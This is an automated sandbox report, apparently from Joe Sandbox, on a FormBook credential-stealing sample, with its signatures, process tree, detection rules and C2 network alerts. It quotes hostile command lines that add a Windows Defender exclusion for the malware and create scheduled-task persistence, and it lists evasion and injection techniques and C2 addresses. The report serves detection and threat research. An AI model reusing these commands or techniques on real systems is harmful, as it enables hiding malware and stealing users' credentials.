Edit tour

Windows Analysis Report
fHkdf4WB7zhMcqP.exe

Overview

General Information

Sample name:	fHkdf4WB7zhMcqP.exe
Analysis ID:	1553424
MD5:	9c0cf646fc8bc953e11228211a03dec8
SHA1:	d2645b38edd984bdcb384b8547e6f6f25ef22d41
SHA256:	6563b16904df3e6e15a66292bee241bee856ab8668da10d15217d7e19c612e53
Tags:	exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

fHkdf4WB7zhMcqP.exe (PID: 6904 cmdline: "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe" MD5: 9C0CF646FC8BC953E11228211A03DEC8)

powershell.exe (PID: 6832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7436 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 2696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6208 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7304 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

qLmzoTzSrlQuBN.exe (PID: 5548 cmdline: "C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

icacls.exe (PID: 7644 cmdline: "C:\Windows\SysWOW64\icacls.exe" MD5: 2E49585E4E08565F52090B144062F97E)

qLmzoTzSrlQuBN.exe (PID: 2992 cmdline: "C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7984 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

vssfbkdOErXuYi.exe (PID: 7340 cmdline: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe MD5: 9C0CF646FC8BC953E11228211A03DEC8)

schtasks.exe (PID: 7716 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp91BE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.1976879958.0000000006940000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.4127950184.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.4128067696.0000000002C20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000013.00000002.4129656762.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1897010665.0000000002F90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: fHkdf4WB7zhMcqP.exe PID: 6904	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vssfbkdOErXuYi.exe PID: 7340	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe", ParentImage: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe, ParentProcessId: 6904, ParentProcessName: fHkdf4WB7zhMcqP.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe", ProcessId: 6832, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp91BE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp91BE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe, ParentImage: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe, ParentProcessId: 7340, ParentProcessName: vssfbkdOErXuYi.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp91BE.tmp", ProcessId: 7716, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe", ParentImage: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe, ParentProcessId: 6904, ParentProcessName: fHkdf4WB7zhMcqP.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp", ProcessId: 6208, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe", ParentImage: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe, ParentProcessId: 6904, ParentProcessName: fHkdf4WB7zhMcqP.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe", ProcessId: 6832, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe", ParentImage: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe, ParentProcessId: 6904, ParentProcessName: fHkdf4WB7zhMcqP.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp", ProcessId: 6208, ProcessName: schtasks.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T06:50:13.553463+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49737	TCP
2024-11-11T06:50:51.378264+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49746	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T06:50:32.007167+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49743	67.223.118.17	80	TCP
2024-11-11T06:50:55.257323+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49748	13.248.169.48	80	TCP
2024-11-11T06:51:08.383809+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49843	13.248.169.48	80	TCP
2024-11-11T06:51:21.610890+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49952	199.59.243.227	80	TCP
2024-11-11T06:51:34.727769+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50025	3.33.130.190	80	TCP
2024-11-11T06:51:48.200322+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50029	162.0.211.143	80	TCP
2024-11-11T06:52:02.332615+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50033	84.32.84.32	80	TCP
2024-11-11T06:52:15.765419+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50037	199.59.243.227	80	TCP
2024-11-11T06:52:29.031855+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50041	3.33.130.190	80	TCP
2024-11-11T06:52:42.967462+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50045	154.23.184.141	80	TCP
2024-11-11T06:52:57.080388+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50049	38.47.233.52	80	TCP
2024-11-11T06:53:10.532111+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50053	188.114.97.3	80	TCP
2024-11-11T06:53:24.067763+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50057	38.55.215.72	80	TCP
2024-11-11T06:53:37.911335+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50061	154.23.184.95	80	TCP
2024-11-11T06:53:51.372021+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50065	172.67.217.176	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T06:50:47.598867+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49744	13.248.169.48	80	TCP
2024-11-11T06:50:50.149750+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49745	13.248.169.48	80	TCP
2024-11-11T06:50:52.689922+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49747	13.248.169.48	80	TCP
2024-11-11T06:51:00.727220+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49785	13.248.169.48	80	TCP
2024-11-11T06:51:04.230809+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49806	13.248.169.48	80	TCP
2024-11-11T06:51:05.815879+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49822	13.248.169.48	80	TCP
2024-11-11T06:51:13.963713+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49888	199.59.243.227	80	TCP
2024-11-11T06:51:16.515789+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49910	199.59.243.227	80	TCP
2024-11-11T06:51:19.075470+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49931	199.59.243.227	80	TCP
2024-11-11T06:51:27.087292+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49993	3.33.130.190	80	TCP
2024-11-11T06:51:29.640680+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50014	3.33.130.190	80	TCP
2024-11-11T06:51:32.187920+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50024	3.33.130.190	80	TCP
2024-11-11T06:51:40.553609+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50026	162.0.211.143	80	TCP
2024-11-11T06:51:43.163727+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50027	162.0.211.143	80	TCP
2024-11-11T06:51:45.693632+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50028	162.0.211.143	80	TCP
2024-11-11T06:51:54.176231+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50030	84.32.84.32	80	TCP
2024-11-11T06:51:56.722469+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50031	84.32.84.32	80	TCP
2024-11-11T06:51:59.667227+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50032	84.32.84.32	80	TCP
2024-11-11T06:52:08.098973+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50034	199.59.243.227	80	TCP
2024-11-11T06:52:10.643077+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50035	199.59.243.227	80	TCP
2024-11-11T06:52:13.228787+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50036	199.59.243.227	80	TCP
2024-11-11T06:52:21.246590+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50038	3.33.130.190	80	TCP
2024-11-11T06:52:23.939248+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50039	3.33.130.190	80	TCP
2024-11-11T06:52:26.479156+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50040	3.33.130.190	80	TCP
2024-11-11T06:52:35.284303+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50042	154.23.184.141	80	TCP
2024-11-11T06:52:37.994818+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50043	154.23.184.141	80	TCP
2024-11-11T06:52:40.396755+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50044	154.23.184.141	80	TCP
2024-11-11T06:52:49.315188+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50046	38.47.233.52	80	TCP
2024-11-11T06:52:51.926518+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50047	38.47.233.52	80	TCP
2024-11-11T06:52:54.411404+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50048	38.47.233.52	80	TCP
2024-11-11T06:53:02.821125+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50050	188.114.97.3	80	TCP
2024-11-11T06:53:05.446211+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50051	188.114.97.3	80	TCP
2024-11-11T06:53:07.961458+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50052	188.114.97.3	80	TCP
2024-11-11T06:53:16.455858+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50054	38.55.215.72	80	TCP
2024-11-11T06:53:19.033236+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50055	38.55.215.72	80	TCP
2024-11-11T06:53:21.533159+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50056	38.55.215.72	80	TCP
2024-11-11T06:53:30.267340+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50058	154.23.184.95	80	TCP
2024-11-11T06:53:32.815454+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50059	154.23.184.95	80	TCP
2024-11-11T06:53:35.360953+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50060	154.23.184.95	80	TCP
2024-11-11T06:53:43.734955+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50062	172.67.217.176	80	TCP
2024-11-11T06:53:46.264188+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50063	172.67.217.176	80	TCP
2024-11-11T06:53:48.809916+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50064	172.67.217.176	80	TCP
2024-11-11T06:53:57.579218+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50066	206.119.82.172	80	TCP
2024-11-11T06:54:00.110406+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50067	206.119.82.172	80	TCP
2024-11-11T06:54:02.782246+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50068	206.119.82.172	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: fHkdf4WB7zhMcqP.exe	ReversingLabs: Detection: 31%
Source: fHkdf4WB7zhMcqP.exe	Virustotal: Detection: 37%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1976879958.0000000006940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4127950184.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4128067696.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4129656762.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1897010665.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: fHkdf4WB7zhMcqP.exe

Joe Sandbox ML: detected

Source: fHkdf4WB7zhMcqP.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: fHkdf4WB7zhMcqP.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: icacls.pdb source: RegSvcs.exe, 00000008.00000002.1895953589.0000000001328000.00000004.00000020.00020000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 0000000B.00000002.4127404685.0000000001058000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qLmzoTzSrlQuBN.exe, 0000000B.00000000.1806716769.0000000000A3E000.00000002.00000001.01000000.0000000D.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000000.1963188407.0000000000A3E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: RegSvcs.pdb, source: icacls.exe, 0000000D.00000002.4129046811.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, icacls.exe, 0000000D.00000002.4127000358.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.0000000002A8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2188781216.0000000025BBC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 0000000D.00000003.1896001542.0000000002B27000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 0000000D.00000003.1897804046.0000000002CDA000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: icacls.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1895953589.0000000001328000.00000004.00000020.00020000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 0000000B.00000002.4127404685.0000000001058000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, icacls.exe, 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 0000000D.00000003.1896001542.0000000002B27000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 0000000D.00000003.1897804046.0000000002CDA000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: icacls.exe, 0000000D.00000002.4129046811.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, icacls.exe, 0000000D.00000002.4127000358.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.0000000002A8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2188781216.0000000025BBC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: rvfz.pdb source: fHkdf4WB7zhMcqP.exe, vssfbkdOErXuYi.exe.0.dr
Source:	Binary string: rvfz.pdbSHA256 source: fHkdf4WB7zhMcqP.exe, vssfbkdOErXuYi.exe.0.dr

Source: C:\Windows\SysWOW64\icacls.exe

Code function: 13_2_0270CB30 FindFirstFileW,FindNextFileW,FindClose,

13_2_0270CB30

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 4x nop then jmp 073F6633h	0_2_073F5CD2
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 4x nop then xor eax, eax	13_2_026F9E60
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 4x nop then mov ebx, 00000004h	13_2_02D204E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49748 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49743 -> 67.223.118.17:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49806 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49785 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49822 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49910 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49843 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49888 -> 199.59.243.227:80
